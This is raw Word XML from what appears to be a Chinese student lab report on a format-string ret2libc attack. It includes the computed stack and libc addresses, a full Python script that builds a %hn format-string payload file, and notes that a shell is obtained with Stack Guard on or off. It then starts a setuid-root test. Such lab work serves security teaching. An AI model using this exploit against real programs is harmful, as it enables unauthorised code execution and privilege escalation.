        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000E1D5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r w:rsidR="000E1D5A">
        <w:t xml:space="preserve"> 0xb7d979d0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="333D423A" w14:textId="77777777" w:rsidR="00847257" w:rsidRDefault="00847257" w:rsidP="00FA06C4"/>
    <w:p w14:paraId="3E8F85E7" w14:textId="108AC799" w:rsidR="00D7471C" w:rsidRDefault="00D7471C" w:rsidP="00FA06C4">
      <w:bookmarkStart w:id="6" w:name="_Hlk76666506"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写程序查看环境变量“/</w:t>
      </w:r>
      <w:r>
        <w:t>bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的地址：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="3717F31A" w14:textId="13140F86" w:rsidR="0063707C" w:rsidRDefault="007C2FCD" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A44E44" wp14:editId="006C3974">
            <wp:extent cx="5274310" cy="13646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E8F" w14:textId="72838FF2" w:rsidR="00D7471C" w:rsidRDefault="00D7471C" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DA2C41C" wp14:editId="687B3692">
            <wp:extent cx="5274310" cy="9017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2F40" w14:textId="3EDA9E0B" w:rsidR="002C7BA7" w:rsidRDefault="009A613F" w:rsidP="00FA06C4">
      <w:bookmarkStart w:id="7" w:name="_Hlk76666693"/>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>et2lib攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDE66F" w14:textId="5533FA63" w:rsidR="009A613F" w:rsidRDefault="009A613F" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将函数的返回地址修改为system的地址A，A+4是执行完system的返回地址，A+8是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/</w:t>
      </w:r>
      <w:r>
        <w:t>bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“的地址</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="46197A0C" w14:textId="5A6AABC7" w:rsidR="00BE2EFD" w:rsidRDefault="00611F73" w:rsidP="009A50DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF1A7D0" wp14:editId="25CDEDA2">
            <wp:extent cx="5274310" cy="1132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33F3" w14:textId="7D847628" w:rsidR="00F10EA3" w:rsidRDefault="00F10EA3" w:rsidP="00F10EA3">
      <w:bookmarkStart w:id="8" w:name="_Hlk76666731"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这三个</w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址分别放在0x</w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:t xml:space="preserve">bffff3cc </w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、 </w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:t xml:space="preserve">0xbffff3d0 </w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、 </w:t>
      </w:r>
      <w:r w:rsidR="006946F4">
        <w:t>0xbffff3d4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5C7D4" w14:textId="5A2AFAEB" w:rsidR="006946F4" w:rsidRDefault="006946F4" w:rsidP="00F10EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这三个地址对应修改的值为：</w:t>
      </w:r>
      <w:r w:rsidR="009216FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="009216FD">
        <w:t>xb7da3da0</w:t>
      </w:r>
      <w:r w:rsidR="00FE5103">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE5103">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="009216FD">
        <w:t xml:space="preserve"> 0xb7d979d0</w:t>
      </w:r>
      <w:r w:rsidR="00FE5103">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE5103">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、 0x</w:t>
      </w:r>
      <w:r w:rsidR="00FE5103">
        <w:t>bfffff65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF2A6A" w14:textId="4C4BAFAD" w:rsidR="00FE5103" w:rsidRDefault="00BA3F85" w:rsidP="00F10EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行修改，</w:t>
      </w:r>
      <w:r w:rsidR="003403E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照大小排序：</w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:t xml:space="preserve">x3da0 </w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0</w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:t xml:space="preserve">x79d0 </w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0</w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:t xml:space="preserve">xb7d9 </w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:t xml:space="preserve">0xb7da </w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、 </w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:t xml:space="preserve">0xbfff </w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0</w:t>
      </w:r>
      <w:r w:rsidR="002F1827">
        <w:t>xff65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40764DBE" w14:textId="6A86CB42" w:rsidR="008978A1" w:rsidRPr="00FE5103" w:rsidRDefault="00291611" w:rsidP="00F10EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的地址为：0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xbffff3cc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xbffff3d0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xbffff3d2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xbffff3ce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bfffff67 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、0x</w:t>
      </w:r>
      <w:r>
        <w:t>bfffff65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC38CC3" w14:textId="05B60498" w:rsidR="002D5E79" w:rsidRDefault="00105AC5" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写脚本生成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p w14:paraId="32DAE149" w14:textId="7FA2E090" w:rsidR="00105AC5" w:rsidRDefault="004877E3" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidR="00F34DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Hlk7666676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5854" w14:paraId="6116FD50" w14:textId="77777777" w:rsidTr="00655854">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41AB5A99" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>#!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BF64F7" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A913935" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="304CB285" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>N = 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0969735C" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t># Fill the content with NOP's</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7B3823" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t xml:space="preserve">content = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bytearray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">0x90 for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(N))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B255487" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="1228B9A1" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>system_addr1 = 0xbffff3ae</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F660F42" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>system_addr2 = 0xbffff3ac</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4964328A" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="23F3B0A0" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>bs_addr1 = 0xbffff3b6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56CBB175" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>bs_addr2 = 0xbffff3b4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F63AC58" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="0DD799D1" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>arrange</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> proper sequence of the address (small to big) --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2334A558" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>0:4]  =  (system_addr2).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>to_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4,byteorder='little')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B7E036" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4:8]  =  ("@@@@").encode('latin-1')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2136C8" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>8:12]  = (system_addr1).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>to_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4,byteorder='little')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173F7538" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="7880A1A8" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>12:16]  =  ("@@@@").encode('latin-1')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C6B2B2" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16:20]  =  (bs_addr1).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>to_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4,byteorder='little')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C262DB" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20:24]  =  ("@@@@").encode('latin-1')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A573FB3" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24:28]  =  (bs_addr2).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>to_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4,byteorder='little')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0033B58F" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="5AC8E86B" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="688936EC" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t># Calculate the value of C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730CF318" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>C = 15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D6C71E" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="14A1BD37" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>common = 28 + 8 * C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE4AF5D" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t># Construct the format string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F284818" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>dat1 = 0x3da0 - common</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37629B3C" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>dat2 = 0xb7da - 0x3da0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEA1075" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>dat3 = 0xbfff - 0xb7da</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A86332B" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>dat4 = 0xff65 - 0xbfff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2965CA38" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="410B98C4" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>s = "%.8x" * C + "%." + str(dat1) + "x" + "%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" + "%." + str(dat2) + "x" + "%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F0698C" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t xml:space="preserve">  + "%." + str(dat3) + "x" + "%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" + "%." + str(dat4) + "x" + "%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460E119A" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="24C61099" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">  =</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (s).encode('latin-1')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D777447" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB4B88F" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>content[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>28:28+len(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">)] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="12192DF4" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t>print(content)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B04A19C" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854"/>
          <w:p w14:paraId="2BB8D1D0" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t xml:space="preserve"># Write the content to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>badfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6C55E104" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:r>
              <w:t xml:space="preserve">file = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>badfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35A64918" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>file.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(content)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="474EF443" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00655854">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>file.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AB9243" w14:textId="77777777" w:rsidR="00655854" w:rsidRDefault="00655854" w:rsidP="00FA06C4"/>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="9"/>
    </w:tbl>
    <w:p w14:paraId="268DFE68" w14:textId="77777777" w:rsidR="00F34DDE" w:rsidRDefault="00F34DDE" w:rsidP="00FA06C4"/>
    <w:p w14:paraId="3B2E62FD" w14:textId="77777777" w:rsidR="004E1B03" w:rsidRDefault="004E1B03" w:rsidP="00FA06C4"/>
    <w:p w14:paraId="31D758DD" w14:textId="49C8FEF8" w:rsidR="0095295E" w:rsidRDefault="000247BE" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EEA5433" wp14:editId="6ACD155E">
            <wp:extent cx="5274310" cy="15652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7785" w14:textId="77777777" w:rsidR="00BA39C6" w:rsidRDefault="00BA39C6" w:rsidP="00FA06C4"/>
    <w:p w14:paraId="274E4335" w14:textId="7B6205E1" w:rsidR="003A6F1A" w:rsidRDefault="003A6F1A" w:rsidP="00484918">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Hlk76667475"/>
      <w:r>
        <w:t>尝试开启和关闭 Stack Guard 保护，观察以上利用结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A888E7B" w14:textId="5DF1BCA5" w:rsidR="00DE1B21" w:rsidRDefault="003D0A2C" w:rsidP="00CE2395">
      <w:bookmarkStart w:id="11" w:name="_Hlk76667579"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启关闭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保护都可以获取shell</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:p w14:paraId="1C1CD6F6" w14:textId="181C0A87" w:rsidR="00484918" w:rsidRDefault="00DE1B21" w:rsidP="00484918">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06CC9CBC" wp14:editId="7F04EF6C">
            <wp:extent cx="5274310" cy="12757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3910" w14:textId="4B06C627" w:rsidR="003A6F1A" w:rsidRDefault="003A6F1A" w:rsidP="00D60E78">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Hlk76667720"/>
      <w:r>
        <w:t xml:space="preserve">尝试设置 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> root，观察是否可以获得 root shel</w:t>
      </w:r>
